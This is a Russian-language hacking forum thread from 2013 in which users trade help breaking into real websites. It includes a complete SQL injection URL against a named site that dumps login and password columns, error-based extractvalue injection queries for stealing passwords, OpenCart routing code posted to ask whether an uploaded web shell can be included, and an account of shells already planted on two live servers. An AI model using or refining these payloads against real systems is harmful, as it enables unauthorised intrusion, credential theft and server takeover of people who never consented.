30.07.2013, 10:22
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от YaBtr
Бессмысленности здесь нет!
er9j6@
привел способ вывода данных в формате
через принтабельное поле.
p.s. уберите лишние пробелы
Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:
Убрав Восклицательный Знак в синтаксисе ( table_schema!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли
|
|
|
30.07.2013, 12:57
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
Что значит данная ошибка, или скорее как ее подправить, чтобы работало?
Код:
ERROR: UNION types integer and text cannot be matched LINE 1
Код:
UNION(SELECT(version()),version(),version(),version(),(version()))
|
|
|
|
30.07.2013, 21:37
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Unknowhacker
Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:
Убрав Восклицательный Знак в синтаксисе (
table_schema
!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли
Извлечь можно:
Сообщение от None
http://
www.nova-plosha.com
/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(0)fr om(novaplosha.wbwuser)where(0x00)in(@x:=concat(@x, 0x3c62723e,dblogin,0x3a,dbpasswd))))x),5,6,7,8,9,1 0,11,12,13,14,15,16+--+
|
|
|
|
31.07.2013, 16:46
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от YaBtr
Извлечь можно:
СпасибО!
|
|
|
|
31.07.2013, 22:50
|
|
Участник форума
Регистрация: 27.04.2009
Сообщений: 189
С нами:
8968720
Репутация:
69
|
|
Подвержен ли данный код LFI ?
В папке "../../download" лежит шелл, как его проинклудить через
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$route[/COLOR][/COLOR]
?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$route[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array()) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], (string)[/COLOR][COLOR="#0000BB"]$route[/COLOR][COLOR="#007700"]));
foreach ([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$part[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$part[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
continue;
}
if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]class[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Controller'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/[^a-zA-Z0-9]/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
break;
}
}
if ([/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]args[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index'[/COLOR][COLOR="#007700"];
}
}
public function[/COLOR][COLOR="#0000BB"]getFile[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getClass[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]class[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getMethod[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getArgs[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]args[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
|
|
|
|
01.08.2013, 09:30
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
TRX.new, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что $this->file попадает в инклуд).
|
|
|
|
01.08.2013, 13:36
|
|
Участник форума
Регистрация: 27.04.2009
Сообщений: 189
С нами:
8968720
Репутация:
69
|
|
Сообщение от XAMEHA
TRX.new
, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что
$this->file
попадает в инклуд).
Вот сюда в итоге попадает $file
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]private function[/COLOR][COLOR="#0000BB"]execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getFile[/COLOR][COLOR="#007700"]();
...
if ([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {
require_once([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Виндовые слеши не отрабатывают, т.к. все на Linux.
Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет. Причем стоит заметить что я заливаю файл test.php.jpg , на сервере имя формируется так test.php.jpg.{md5(mt_rand())}. Имя файла на сервере узнать легко, поэтому это не проблема. Задача на сервере с 1.5.2.1 выполнить shell , но там получаю файл как картинку.
Версия PHP на обоих серваках : 5.2.17
Также в корне сайта есть php.ini
1.5.3.1 :
Код:
magic_quotes_gpc = Off;
register_globals = off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
display_errors = 1;
error_reporting = E_ALL;
1.5.2.1:
Код:
magic_quotes_gpc = Off;
magic_quotes_runtime = Off;
magic_quotes_sybase = Off;
register_globals = Off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
date.timezone = Asia/Yekaterinburg;
;display_errors = 1;
;error_reporting = E_ALL;
Не думаю, что они положили отдельный файлик .htaccess в папку download.
Цель : выполнить shell на серве с 1.5.2.1
|
|
|
|
01.08.2013, 16:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от None
Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет.
Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?
По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html
|
|
|
|
01.08.2013, 16:32
|
|
Участник форума
Регистрация: 27.04.2009
Сообщений: 189
С нами:
8968720
Репутация:
69
|
|
Сообщение от XAMEHA
Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?
По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html
Спасибо большое. Статья вот: http://www.waraxe.us/advisory-84.html
Это для версии 1.5.2.1 , но применил и к 1.5.3.1 (и здесь то как раз работает, я получил рабочий шелл). В случае с 1.5.2.1 шелл грузится как изображение.
|
|
|
|
01.08.2013, 20:49
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом
Код:
and(extractvalue(1,concat(0x3a,database())))and'
, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)
Код:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'
задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите! |
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
